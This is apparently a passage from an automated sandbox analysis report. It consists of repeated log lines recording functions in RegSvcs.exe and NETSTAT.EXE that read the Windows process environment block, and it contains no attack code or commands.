      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131746D mov eax, dword ptr fs:[00000030h]1_2_0131746D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]1_2_0138C450
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]1_2_0138C450
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A44B mov eax, dword ptr fs:[00000030h]1_2_0132A44B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130849B mov eax, dword ptr fs:[00000030h]1_2_0130849B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B14FB mov eax, dword ptr fs:[00000030h]1_2_013B14FB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]1_2_01376CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]1_2_01376CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]1_2_01376CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8CD6 mov eax, dword ptr fs:[00000030h]1_2_013C8CD6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]1_2_012F4F2E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]1_2_012F4F2E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132E730 mov eax, dword ptr fs:[00000030h]1_2_0132E730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]1_2_0131B73D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]1_2_0131B73D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131F716 mov eax, dword ptr fs:[00000030h]1_2_0131F716
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]1_2_0138FF10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]1_2_0138FF10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]1_2_013C070D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]1_2_013C070D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]1_2_0132A70E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]1_2_0132A70E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130FF60 mov eax, dword ptr fs:[00000030h]1_2_0130FF60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8F6A mov eax, dword ptr fs:[00000030h]1_2_013C8F6A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130EF40 mov eax, dword ptr fs:[00000030h]1_2_0130EF40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]1_2_01377794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]1_2_01377794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]1_2_01377794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01308794 mov eax, dword ptr fs:[00000030h]1_2_01308794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013337F5 mov eax, dword ptr fs:[00000030h]1_2_013337F5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFE3F mov eax, dword ptr fs:[00000030h]1_2_013AFE3F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FE620 mov eax, dword ptr fs:[00000030h]1_2_012FE620
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h]1_2_0132A61C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h]1_2_0132A61C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]1_2_012FC600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]1_2_012FC600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]1_2_012FC600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01328E00 mov eax, dword ptr fs:[00000030h]1_2_01328E00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1608 mov eax, dword ptr fs:[00000030h]1_2_013B1608
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]1_2_0131AE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]1_2_0131AE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]1_2_0131AE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]1_2_0131AE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]1_2_0131AE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130766D mov eax, dword ptr fs:[00000030h]1_2_0130766D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]1_2_01307E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]1_2_01307E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]1_2_01307E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]1_2_01307E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]1_2_01307E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]1_2_01307E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h]1_2_013BAE44
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h]1_2_013BAE44
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013746A7 mov eax, dword ptr fs:[00000030h]1_2_013746A7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]1_2_013C0EA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]1_2_013C0EA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]1_2_013C0EA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FE87 mov eax, dword ptr fs:[00000030h]1_2_0138FE87
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013216E0 mov ecx, dword ptr fs:[00000030h]1_2_013216E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013076E2 mov eax, dword ptr fs:[00000030h]1_2_013076E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8ED6 mov eax, dword ptr fs:[00000030h]1_2_013C8ED6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01338EC7 mov eax, dword ptr fs:[00000030h]1_2_01338EC7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFEC0 mov eax, dword ptr fs:[00000030h]1_2_013AFEC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013236CC mov eax, dword ptr fs:[00000030h]1_2_013236CC
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359F358 mov eax, dword ptr fs:[00000030h]10_2_0359F358
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359DB40 mov eax, dword ptr fs:[00000030h]10_2_0359DB40
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h]10_2_035C3B7A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h]10_2_035C3B7A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359DB60 mov ecx, dword ptr fs:[00000030h]10_2_0359DB60
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03668B58 mov eax, dword ptr fs:[00000030h]10_2_03668B58
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]10_2_035BA309
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365131B mov eax, dword ptr fs:[00000030h]10_2_0365131B
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036153CA mov eax, dword ptr fs:[00000030h]10_2_036153CA
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036153CA mov eax, dword ptr fs:[00000030h]10_2_036153CA
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BDBE9 mov eax, dword ptr fs:[00000030h]10_2_035BDBE9
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]10_2_035C03E2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]10_2_035C03E2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]10_2_035C03E2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]10_2_035C03E2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]10_2_035C03E2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]10_2_035C03E2
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03665BA5 mov eax, dword ptr fs:[00000030h]10_2_03665BA5
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C2397 mov eax, dword ptr fs:[00000030h]10_2_035C2397
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CB390 mov eax, dword ptr fs:[00000030h]10_2_035CB390
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h]10_2_035A1B8F
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h]10_2_035A1B8F
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364D380 mov ecx, dword ptr fs:[00000030h]10_2_0364D380
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365138A mov eax, dword ptr fs:[00000030h]10_2_0365138A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]10_2_035C4BAD
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]10_2_035C4BAD
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]10_2_035C4BAD
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h]10_2_0364B260
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h]10_2_0364B260
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03668A62 mov eax, dword ptr fs:[00000030h]10_2_03668A62
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]10_2_03599240
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]10_2_03599240
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]10_2_03599240
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]10_2_03599240
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D927A mov eax, dword ptr fs:[00000030h]10_2_035D927A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365EA55 mov eax, dword ptr fs:[00000030h]10_2_0365EA55
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03624257 mov eax, dword ptr fs:[00000030h]10_2_03624257
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B3A1C mov eax, dword ptr fs:[00000030h]10_2_035B3A1C
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]10_2_03595210
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov ecx, dword ptr fs:[00000030h]10_2_03595210
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]10_2_03595210
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]10_2_03595210
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h]10_2_0359AA16
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h]10_2_0359AA16
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A8A0A mov eax, dword ptr fs:[00000030h]10_2_035A8A0A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h]10_2_035D4A2C
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h]10_2_035D4A2C
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]10_2_035BA229
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h]10_2_0365AA16
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h]10_2_0365AA16
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C2ACB mov eax, dword ptr fs:[00000030h]10_2_035C2ACB
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C2AE4 mov eax, dword ptr fs:[00000030h]10_2_035C2AE4
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h]10_2_035CD294
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h]10_2_035CD294
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h]10_2_035AAAB0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h]10_2_035AAAB0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CFAB0 mov eax, dword ptr fs:[00000030h]10_2_035CFAB0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]10_2_035952A5
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]10_2_035952A5
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]10_2_035952A5
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]10_2_035952A5
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]10_2_035952A5
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h]10_2_035BB944
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h]10_2_035BB944
